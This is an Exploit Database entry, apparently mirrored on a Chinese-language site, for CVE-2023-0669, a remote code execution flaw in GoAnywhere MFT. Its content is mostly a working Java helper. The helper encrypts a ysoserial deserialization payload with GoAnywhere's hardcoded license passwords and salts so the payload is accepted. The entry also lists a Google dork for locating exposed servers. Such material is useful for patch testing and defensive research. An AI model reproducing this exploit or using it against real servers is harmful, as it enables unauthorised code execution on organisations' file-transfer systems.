Goanywhere Encryption helper 7.1.1 – Remote Code Execution (RCE)

• Exploit Database
• 12 阅读

• 作者： Youssef Muhammad
  日期： 2023-04-08
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/51339/

• // Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)
  // Google Dork:title:"GoAnywhere" 
  // Date: 3/26/2023
  // Exploit Author: Youssef Muhammad
  // Vendor Homepage: https://www.goanywhere.com/
  // Software Link:https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0
  // Version:> 7.1.1 for windows / > 7.0.3 for Linux 
  // Tested on: Windows, Linux
  // CVE : CVE-2023-0669
  // This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution 
  
  import java.util.Base64;
  import javax.crypto.Cipher;
  import java.nio.charset.StandardCharsets;
  import javax.crypto.SecretKeyFactory;
  import javax.crypto.spec.PBEKeySpec;
  import javax.crypto.spec.IvParameterSpec;
  import javax.crypto.spec.SecretKeySpec;
  import java.nio.file.Files;
  import java.nio.file.Paths;
  public class CVE_2023_0669_helper {
  static String ALGORITHM = "AES/CBC/PKCS5Padding";
  static byte[] KEY = new byte[30];
  static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);
  public static void main(String[] args) throws Exception {
  if (args.length != 2) {
  System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");
  System.exit(1);
  }
  String filePath = args[0];
  String version = args[1];
  byte[] fileContent = Files.readAllBytes(Paths.get(filePath));
  String encryptedContent = encrypt(fileContent, version);
  System.out.println(encryptedContent);
  }
  public static String encrypt(byte[] data, String version) throws Exception {
  Cipher cipher = Cipher.getInstance(ALGORITHM);
  KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();
  SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");
  IvParameterSpec ivSpec = new IvParameterSpec(IV);
  cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);
  byte[] encryptedObject = cipher.doFinal(data);
  String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);
  String v = (version.equals("2")) ? "$2" : "";
  bundle += v;
  return bundle;
  }
  private static byte[] getInitializationValue() throws Exception {
  // Version 1 Encryption
  String param1 = "go@nywhereLicenseP@$$wrd";
  byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};
  return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();
  }
  private static byte[] getInitializationValueV2() throws Exception {
  // Version 2 Encryption
  String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";
  byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};
  return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();
  }
  }